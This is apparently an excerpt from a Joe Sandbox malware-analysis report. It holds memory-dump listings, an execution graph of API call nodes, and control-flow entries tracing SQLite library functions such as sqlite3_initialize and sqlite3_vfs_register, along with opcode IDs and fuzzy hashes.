                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$h$o
                                                    • API String ID: 0-3662636641
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2$9$A$J
                                                    • API String ID: 0-2876596324
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: J$ds$q;wz$q;wzds
                                                    • API String ID: 0-4046768835

                                                    Execution Graph

                                                    Execution Coverage:1.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0.2%
                                                    Total number of Nodes:502
                                                    Total number of Limit Nodes:64
API calls 28803->28920 28805->28801 28807 61e121d2 28806->28807 28808 61e12157 28806->28808 28807->28708 28807->28709 28808->28807 28921 61e114d9 10 API calls 28808->28921 28810 61e121bc 28810->28807 28922 61e0f5d9 sqlite3_free 28810->28922 28813 61e43e7f strcmp 28812->28813 28814 61e43ea9 28812->28814 28813->28814 28843 61e441c5 28813->28843 28815 61e123e5 6 API calls 28814->28815 28814->28843 28824 61e43f09 28815->28824 28816 61e123e5 6 API calls 28817 61e44392 28816->28817 28819 61e44398 28817->28819 28820 61e443aa 28817->28820 28818 61e44b18 28818->28719 28874 61e1318f 28818->28874 28942 61e0f5d9 sqlite3_free 28819->28942 28822 61e444b1 28820->28822 28943 61e0f5d9 sqlite3_free 28820->28943 28846 61e4457a 28822->28846 28923 61e0161c 28822->28923 28823 61e123e5 6 API calls 28833 61e44161 28823->28833 28824->28818 28830 61e0fff3 6 API calls 28824->28830 28856 61e44149 28824->28856 28828 61e449b3 sqlite3_free sqlite3_free 28869 61e4496a 28828->28869 28829 61e443a5 28829->28828 28945 61e43d77 89 API calls 28829->28945 28832 61e43f9c 28830->28832 28836 61e43fc4 28832->28836 28837 61e43fb2 sqlite3_free 28832->28837 28835 61e449ae 28833->28835 28842 61e0fff3 6 API calls 28833->28842 28833->28843 28834 61e44a0e sqlite3_mutex_leave 28834->28818 28835->28828 28839 61e43fcd 28836->28839 28847 61e43ffe sqlite3_free sqlite3_free 28836->28847 28837->28818 28838 61e445dd 28851 61e44305 28838->28851 28944 61e0a964 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 28838->28944 28848 61e4402f sqlite3_mutex_enter 28839->28848 28840 61e44551 sqlite3_uri_boolean 28845 61e44580 sqlite3_uri_boolean 28840->28845 28840->28846 28866 61e4422d 28842->28866 28843->28816 28843->28829 28844 61e4467e sqlite3_free 28844->28851 28845->28846 28926 61e13fdf 28846->28926 28847->28818 28938 61e01718 28848->28938 28850 61e44506 28850->28838 28850->28840 28851->28829 28858 61e447a4 28851->28858 28935 61e014e3 28851->28935 28853 61e44056 28854 61e4412c 
sqlite3_mutex_leave sqlite3_free 28853->28854 28855 61e44069 strcmp 28853->28855 28863 61e44099 28853->28863 28854->28856 28872 61e448c4 28854->28872 28855->28853 28856->28823 28858->28829 28861 61e13fdf 15 API calls 28858->28861 28873 61e44a77 28858->28873 28859 61e1318f 3 API calls 28859->28869 28860 61e4410a 28860->28854 28865 61e44889 28861->28865 28862 61e442f8 28941 61e0f5d9 sqlite3_free 28862->28941 28863->28860 28864 61e440ce sqlite3_mutex_leave sqlite3_mutex_leave sqlite3_free sqlite3_free 28863->28864 28864->28818 28865->28829 28865->28872 28865->28873 28866->28829 28866->28843 28866->28862 28940 61e28a17 sqlite3_log 28866->28940 28869->28818 28869->28834 28870 61e442e6 28870->28843 28870->28862 28871 61e44aba sqlite3_mutex_enter sqlite3_mutex_leave 28871->28873 28872->28859 28873->28829 28873->28871 28875 61e131a7 28874->28875 28876 61e13198 28874->28876 28875->28721 28876->28875 28877 61e1311c sqlite3_mutex_try 28876->28877 28878 61e13138 28877->28878 28879 61e13146 28877->28879 28878->28721 28880 61e1316c sqlite3_mutex_enter 28879->28880 29012 61e02c59 sqlite3_mutex_leave 28879->29012 28881 61e1315f 28880->28881 28881->28878 28881->28880 28884 61e15278 28883->28884 28885 61e1526c 28883->28885 28884->28723 28886 61e1318f 3 API calls 28885->28886 28886->28884 28888 61e113e6 sqlite3_free 28887->28888 28889 61e113f4 28887->28889 28888->28889 28890 61e0fff3 6 API calls 28889->28890 28891 61e11423 28889->28891 28890->28891 28891->28743 28892->28712 28893->28712 28894->28718 28895->28739 28896->28783 28897->28760 28898->28754 28899->28766 28900->28774 28901->28789 28902->28757 28903->28745 28904->28791 28905->28770 28907 61e1000f 28906->28907 28908 61e100e3 28906->28908 28907->28908 28909 61e1002a sqlite3_mutex_enter 28907->28909 28908->28690 28913 61e10040 28909->28913 28910 61e10097 28916 61e273a9 malloc 28910->28916 28911 61e100ac 28912 61e100d2 sqlite3_mutex_leave 28911->28912 28912->28908 28913->28910 28919 61e09aba sqlite3_mutex_leave 
sqlite3_mutex_enter 28913->28919 28917 61e273c2 28916->28917 28918 61e273cf sqlite3_log 28916->28918 28917->28911 28918->28917 28919->28910 28920->28802 28921->28810 28922->28807 28946 61e3920b 28923->28946 28929 61e13ff6 28926->28929 28927 61e140ad 28927->28838 28929->28927 28930 61e14057 28929->28930 28987 61e13f07 28929->28987 28999 61e0a964 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 28930->28999 28931 61e14051 28931->28930 28933 61e140a2 28931->28933 28998 61e0a964 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 28933->28998 29000 61e271b5 28935->29000 28939 61e01721 sqlite3_mutex_enter 28938->28939 28939->28853 28940->28870 28941->28851 28942->28829 28943->28822 28944->28844 28945->28835 28947 61e3924b 28946->28947 28948 61e39259 28946->28948 28986 61e38f24 30 API calls 28947->28986 28981 61e01645 28948->28981 28982 61e177da 28948->28982 28951 61e39271 28952 61e39278 sqlite3_free 28951->28952 28953 61e3928d 28951->28953 28952->28981 28954 61e392b0 sqlite3_win32_is_nt 28953->28954 28955 61e39297 28953->28955 28954->28955 28956 61e392b9 28954->28956 28955->28956 28957 61e1768b sqlite3_win32_sleep 28955->28957 28958 61e3932a 28955->28958 28956->28958 28959 61e3930a sqlite3_free sqlite3_free 28956->28959 28957->28955 28960 61e39398 CreateFileW 28958->28960 28961 61e3938f sqlite3_win32_is_nt 28958->28961 28959->28981 28963 61e393e7 28960->28963 28964 61e393d8 28960->28964 28961->28960 28962 61e393ec 28961->28962 28962->28963 28971 61e1768b sqlite3_win32_sleep 28962->28971 28965 61e26cd5 sqlite3_log 28963->28965 28964->28960 28964->28963 28966 61e1768b sqlite3_win32_sleep 28964->28966 28967 61e3944b 28965->28967 28966->28964 28968 61e39457 28967->28968 28969 61e394d9 sqlite3_free sqlite3_free 28967->28969 28970 61e2638f 14 API calls 28968->28970 28973 61e39518 sqlite3_uri_boolean 28969->28973 28974 61e3947a sqlite3_free sqlite3_free 28970->28974 28971->28962 28973->28981 
28976 61e39496 28974->28976 28977 61e394c8 28974->28977 28976->28977 28978 61e3949c 28976->28978 28979 61e28a17 sqlite3_log 28977->28979 28980 61e3920b 34 API calls 28978->28980 28979->28981 28980->28981 28981->28850 28983 61e177f5 sqlite3_win32_is_nt 28982->28983 28984 61e177eb 28982->28984 28983->28984 28985 61e177fe 28983->28985 28984->28983 28986->28948 28988 61e13f1a 28987->28988 28989 61e13f2d sqlite3_mutex_enter 28987->28989 28990 61e0fff3 6 API calls 28988->28990 28991 61e13f84 sqlite3_mutex_leave 28989->28991 28992 61e13f44 28989->28992 28994 61e13f22 28990->28994 28991->28988 28993 61e13f28 28991->28993 28992->28991 28993->28931 28994->28993 28995 61e13f9f sqlite3_mutex_enter 28994->28995 28996 61e13fb6 28995->28996 28997 61e13fc8 sqlite3_mutex_leave 28996->28997 28997->28993 28998->28927 28999->28927 29005 61e271df 29000->29005 29001 61e27249 ReadFile 29002 61e27272 29001->29002 29001->29005 29009 61e26cd5 sqlite3_log 29002->29009 29004 61e0150a 29004->28858 29005->29001 29005->29002 29005->29004 29007 61e272a5 29005->29007 29010 61e1768b sqlite3_win32_sleep 29005->29010 29011 61e2638f 14 API calls 29007->29011 29009->29004 29010->29005 29011->29004 29012->28879 29013 61e7607b sqlite3_mutex_enter 29021 61e760bc 29013->29021 29014 61e76277 29092 61e2926c 11 API calls 29014->29092 29015 61e7626d 29086 61e0f5d9 sqlite3_free 29015->29086 29017 61e0f637 sqlite3_free 29017->29021 29018 61e764ab 29093 61e0f5d9 sqlite3_free 29018->29093 29021->29017 29029 61e76142 29021->29029 29034 61e76173 29021->29034 29035 61e761dc 29021->29035 29040 61e761a3 29021->29040 29046 61e131a9 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 29021->29046 29047 61e5ede5 29021->29047 29084 61e106be 6 API calls 29021->29084 29087 61e20b18 8 API calls 29021->29087 29088 61e21884 8 API calls 29021->29088 29089 61e169f4 16 API calls 29021->29089 29090 61e15343 7 API calls 29021->29090 29091 61e75efd 16 API calls 29021->29091 29024 61e764b5 29094 61e119f8 sqlite3_free 
sqlite3_free 29024->29094 29027 61e764bd 29095 61e0f5d9 sqlite3_free 29027->29095 29080 61e29a7c 9 API calls 29029->29080 29030 61e764c7 29032 61e764d1 sqlite3_mutex_leave 29030->29032 29034->29040 29081 61e0f5d9 sqlite3_free 29034->29081 29082 61e0f5d9 sqlite3_free 29035->29082 29038 61e761e6 29083 61e2dfee 9 API calls 29038->29083 29040->29014 29040->29015 29085 61e526eb 121 API calls 29040->29085 29046->29021 29096 61e5e966 29047->29096 29050 61e5eed4 29050->29021 29052 61e5ee14 29052->29050 29101 61e03e4e sqlite3_stricmp sqlite3_stricmp 29052->29101 29054 61e5f00f 29112 61e29a7c 9 API calls 29054->29112 29055 61e5efe8 29111 61e29a7c 9 API calls 29055->29111 29056 61e5ee3f 29058 61e5ee5b sqlite3_strnicmp 29056->29058 29063 61e5eeb8 29056->29063 29079 61e5ef28 29056->29079 29060 61e5ee7e 29058->29060 29058->29079 29102 61e045ba sqlite3_stricmp 29060->29102 29062 61e5ee89 29062->29079 29103 61e1235e 11 API calls 29062->29103 29063->29050 29065 61e5ef2d 29063->29065 29066 61e5ef1f 29063->29066 29063->29079 29105 61e2192e 8 API calls 29065->29105 29104 61e0f5d9 sqlite3_free 29066->29104 29069 61e5ef5a 29106 61e2192e 8 API calls 29069->29106 29071 61e5ef65 29107 61e2192e 8 API calls 29071->29107 29073 61e5ef79 29108 61e2e092 11 API calls 29073->29108 29075 61e5ef94 29075->29050 29109 61e29a7c 9 API calls 29075->29109 29077 61e5efb6 29110 61e0f5d9 sqlite3_free 29077->29110 29079->29050 29079->29054 29079->29055 29080->29034 29081->29040 29082->29038 29083->29040 29084->29021 29085->29015 29086->29014 29087->29021 29088->29021 29089->29021 29090->29021 29091->29021 29092->29018 29093->29024 29094->29027 29095->29030 29097 61e5e980 29096->29097 29098 61e5e978 29096->29098 29097->29050 29100 61e03d57 sqlite3_stricmp 29097->29100 29113 61e5e8a4 29098->29113 29100->29052 29101->29056 29102->29062 29103->29063 29104->29079 29105->29069 29106->29071 29107->29073 29108->29075 29109->29077 29110->29079 29111->29050 29112->29050 29116 61e5e8d6 29113->29116 29114 61e5e918 29115 
61e5e916 29114->29115 29117 61e5e5f3 113 API calls 29114->29117 29115->29097 29116->29114 29116->29115 29122 61e5e5f3 29116->29122 29149 61e1210d sqlite3_free sqlite3_free sqlite3_free sqlite3_free 29116->29149 29118 61e5e932 29117->29118 29118->29115 29150 61e1210d sqlite3_free sqlite3_free sqlite3_free sqlite3_free 29118->29150 29151 61e6bbb1 29122->29151 29125 61e5e686 29125->29116 29126 61e1318f 3 API calls 29127 61e5e6a2 29126->29127 29128 61e5e6dc 29127->29128 29169 61e3d349 29127->29169 29137 61e5e6fb 29128->29137 29189 61e134f9 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 29128->29189 29131 61e5e6b9 29131->29128 29132 61e5e6c6 29131->29132 29188 61e11306 sqlite3_free 29132->29188 29134 61e5e78a 29191 61e11306 sqlite3_free 29134->29191 29135 61e5e76b 29135->29134 29138 61e5e7a3 29135->29138 29137->29134 29137->29135 29190 61e13718 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 29137->29190 29192 61e2dfee 9 API calls 29138->29192 29142 61e5e7d6 sqlite3_exec 29193 61e0f5d9 sqlite3_free 29142->29193 29144 61e5e82c 29145 61e5e83a 29144->29145 29194 61e5e519 11 API calls 29144->29194 29147 61e5e79e 29145->29147 29195 61e13258 7 API calls 29145->29195 29147->29125 29196 61e42cce 94 API calls 29147->29196 29149->29116 29150->29115 29152 61e6bbf1 29151->29152 29153 61e6bbdb 29151->29153 29155 61e5e665 29152->29155 29156 61e6bbff 29152->29156 29157 61e6bc08 sqlite3_strnicmp 29152->29157 29197 61e2e004 10 API calls 29153->29197 29155->29125 29155->29126 29199 61e2e004 10 API calls 29156->29199 29158 61e6bc3c 29157->29158 29159 61e6bcdd 29157->29159 29161 61e6bc53 sqlite3_prepare 29158->29161 29159->29156 29166 61e6bcff 29159->29166 29162 61e6bc96 29161->29162 29163 61e6bcd0 sqlite3_finalize 29161->29163 29162->29163 29164 61e6bcaa 29162->29164 29165 61e6bcbc sqlite3_errmsg 29162->29165 29163->29155 29164->29163 29198 61e2e004 10 API calls 29165->29198 29166->29155 29200 61e2e004 10 API calls 29166->29200 29170 61e1318f 3 API calls 29169->29170 
29178 61e3d360 29170->29178 29171 61e3d8c1 29171->29131 29172 61e3d7f5 29172->29171 29231 61e126fe 9 API calls 29172->29231 29176 61e3d7fa 29176->29171 29176->29172 29230 61e39f2b 71 API calls 29176->29230 29178->29172 29178->29176 29179 61e3d464 memcmp 29178->29179 29180 61e3d4a2 memcmp 29178->29180 29182 61e3d723 memcmp 29178->29182 29183 61e3d51b memcmp 29178->29183 29187 61e13fdf 15 API calls 29178->29187 29201 61e3a91a 29178->29201 29223 61e02ffb 29178->29223 29226 61e8b1c5 47 API calls 29178->29226 29227 61e0af47 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 29178->29227 29228 61e2742d sqlite3_log 29178->29228 29229 61e3d291 71 API calls 29178->29229 29179->29178 29180->29178 29182->29178 29183->29178 29187->29178 29188->29125 29190->29135 29191->29147 29192->29142 29193->29144 29194->29145 29196->29125 29197->29155 29198->29163 29199->29155 29200->29155 29202 61e3a932 29201->29202 29203 61e3ac7f 29201->29203 29206 61e3abb0 29202->29206 29212 61e3a958 29202->29212 29218 61e0161c 45 API calls 29202->29218 29220 61e3a9ef 29202->29220 29222 61e3aa3d 29202->29222 29203->29206 29235 61e335e4 28 API calls 29203->29235 29204 61e3ad31 29204->29178 29206->29204 29236 61e12d72 sqlite3_free sqlite3_free 29206->29236 29208 61e014e3 17 API calls 29209 61e3abe9 29208->29209 29209->29206 29210 61e3ac04 memcmp 29209->29210 29215 61e3ac22 29210->29215 29211 61e3ab63 29211->29206 29211->29222 29233 61e3a458 71 API calls 29211->29233 29212->29206 29212->29211 29214 61e0161c 45 API calls 29212->29214 29212->29222 29216 61e3ab4d 29214->29216 29215->29203 29234 61e8b1c5 47 API calls 29215->29234 29216->29211 29232 61e28a17 sqlite3_log 29216->29232 29217 61e014e3 17 API calls 29217->29212 29218->29220 29220->29212 29220->29217 29220->29222 29222->29206 29222->29208 29222->29215 29237 61e029e5 29223->29237 29225 61e0301b 29225->29178 29226->29178 29227->29178 29228->29178 29229->29178 29230->29172 29231->29171 29232->29211 29233->29222 
29234->29203 29235->29203 29236->29204 29240 61e3c538 29237->29240 29238 61e02a04 29238->29225 29241 61e3c54b 29240->29241 29249 61e3c55a 29240->29249 29265 61e2742d sqlite3_log 29241->29265 29243 61e3c653 29266 61e2742d sqlite3_log 29243->29266 29244 61e3c664 29248 61e3c67a 29244->29248 29250 61e3c6bd 29244->29250 29247 61e3c65d 29258 61e3c555 29247->29258 29270 61e3b345 71 API calls 29247->29270 29248->29247 29253 61e3c686 29248->29253 29249->29243 29249->29244 29249->29247 29249->29258 29251 61e3c6ce 29250->29251 29269 61e32ec5 8 API calls 29250->29269 29251->29247 29259 61e07e08 29251->29259 29255 61e3c69e 29253->29255 29253->29258 29267 61e12a33 7 API calls 29253->29267 29268 61e12b76 7 API calls 29255->29268 29258->29238 29260 61e07e30 29259->29260 29261 61e07e82 29259->29261 29262 61e014e3 17 API calls 29260->29262 29263 61e014e3 17 API calls 29261->29263 29264 61e07e7e 29262->29264 29263->29264 29264->29247 29265->29258 29266->29247 29267->29255 29268->29258 29269->29251 29271 61e17d9d 29272 61e1815a 29271->29272 29273 61e17dac 29271->29273 29273->29272 29274 61e17dce sqlite3_mutex_enter 29273->29274 29275 61e17df0 29274->29275 29283 61e17e0d 29274->29283 29276 61e17df9 sqlite3_config 29275->29276 29275->29283 29276->29283 29277 61e17f44 sqlite3_mutex_leave sqlite3_mutex_enter 29278 61e180fb sqlite3_mutex_leave sqlite3_mutex_enter 29277->29278 29284 61e17f6f 29277->29284 29279 61e18122 sqlite3_mutex_free 29278->29279 29280 61e18139 sqlite3_mutex_leave 29278->29280 29279->29280 29280->29272 29281 61e17efc sqlite3_mutex_leave 29281->29272 29283->29277 29283->29281 29284->29278 29285 61e17fcc sqlite3_malloc 29284->29285 29287 61e17ff9 sqlite3_config 29284->29287 29288 61e1800d 29284->29288 29286 61e18027 sqlite3_free sqlite3_os_init 29285->29286 29289 61e17feb 29285->29289 29286->29289 29287->29288 29288->29285 29288->29289 29289->29278 29290 61e1825f GetSystemInfo sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    APIs
                                                    • sqlite3_initialize.SQLITE3 ref: 61E88A18
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17DD4
                                                      • Part of subcall function 61E17D9D: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E17E08
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18153
                                                    • sqlite3_free.SQLITE3 ref: 61E88A9D
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E88AB2
                                                      • Part of subcall function 61E357C2: memcmp.MSVCRT ref: 61E35810
                                                      • Part of subcall function 61E357C2: sqlite3_malloc64.SQLITE3 ref: 61E35844
                                                    • sqlite3_create_function.SQLITE3 ref: 61E8942B
                                                    • sqlite3_create_function.SQLITE3 ref: 61E89475
                                                    • sqlite3_create_function.SQLITE3 ref: 61E89525
                                                    • sqlite3_create_function.SQLITE3 ref: 61E89579
                                                    • sqlite3_free.SQLITE3 ref: 61E88CD5
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_errcode.SQLITE3 ref: 61E89665
                                                    • sqlite3_close.SQLITE3 ref: 61E89676
                                                    • sqlite3_free.SQLITE3 ref: 61E89693
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E896A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_create_function$sqlite3_freesqlite3_mutex_enter$sqlite3_mutex_leave$memcmpsqlite3_closesqlite3_configsqlite3_errcodesqlite3_initializesqlite3_malloc64
                                                    • String ID: BINARY$NOCASE$RTRIM$`da$fts3$fts4$fts5$fts5vocab$p_a$porter$rtree$rtree_i32$simple$unicode61$`a
                                                    • API String ID: 1097977795-2718777411
                                                    • Opcode ID: b619e4f99343ed7622057b3609f50fe014b2a63ff5a514a2c494b181803bd39c
                                                    • Instruction ID: 353953454cf66a83b840efa96aed405e13341269f318b144d262a95d4aa27974
                                                    • Opcode Fuzzy Hash: b619e4f99343ed7622057b3609f50fe014b2a63ff5a514a2c494b181803bd39c
                                                    • Instruction Fuzzy Hash: A87206B0A083428FE740DF69C59574ABBF1BFC5358F25C82DE8988B385D779D8458B82

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 754 61e1825f-61e182d6 GetSystemInfo sqlite3_vfs_register * 4
                                                    APIs
                                                    • GetSystemInfo.KERNEL32(?,?,61E9E580,?,61E18034,?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18279
                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E1828F
                                                      • Part of subcall function 61E181FC: sqlite3_initialize.SQLITE3(?,?,61E18294), ref: 61E18207
                                                      • Part of subcall function 61E181FC: sqlite3_mutex_enter.SQLITE3(?,?,61E18294), ref: 61E1821F
                                                      • Part of subcall function 61E181FC: sqlite3_mutex_leave.SQLITE3(?), ref: 61E18251
                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E182A3
                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E182B7
                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E182CB
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_vfs_register$InfoSystemsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 3532963230-0
                                                    • Opcode ID: 75965ddb2269b8edbf3885b943fcc6cd509c2890a4864c204bf8cf1466f41b05
                                                    • Instruction ID: f4adc7e5cba52e1e67823a72f93f23c0d9953133953df27d674b99686b1a82ec
                                                    • Opcode Fuzzy Hash: 75965ddb2269b8edbf3885b943fcc6cd509c2890a4864c204bf8cf1466f41b05
                                                    • Instruction Fuzzy Hash: 64F034B1208644ABC380AF69C506B6ABAE4BBC2708F21C81DD1888B294C771C848AB57
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_enter$strcmp
                                                    • String ID: -journal$@
                                                    • API String ID: 42632313-41206085
                                                    • Opcode ID: 432c37ed213bb684e3fdf39cf681bce07f847e087d1cce43a32b4ab238a17255
                                                    • Instruction ID: fe7e11a9fd44bee053b1b347378700ffa5302ac0beb5867e547a56e3f642e4b4
                                                    • Opcode Fuzzy Hash: 432c37ed213bb684e3fdf39cf681bce07f847e087d1cce43a32b4ab238a17255
                                                    • Instruction Fuzzy Hash: 09820574A04265CFEB10CF68D884B89BBF1BF49308F2981EAD8589B352D774D985CF51

                                                    Control-flow Graph

                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17DD4
                                                    • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E17E08
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17F50
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17F5D
                                                    • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17FE2
                                                    • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E18008
                                                    • sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1802A
                                                    • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1802F
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18103
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1810E
                                                    • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1812A
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1813F
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18153
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_config$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                    • String ID: sa
                                                    • API String ID: 1590227068-3658032161
                                                    • Opcode ID: f50511680cdd63bc2ebdfd191ed6b6942f2258144978115b265b51410ecbbdd7
                                                    • Instruction ID: ea7971cbe203f9529516d9d6f049fd3ffae9965bebabd814da69a38b5beeeb3e
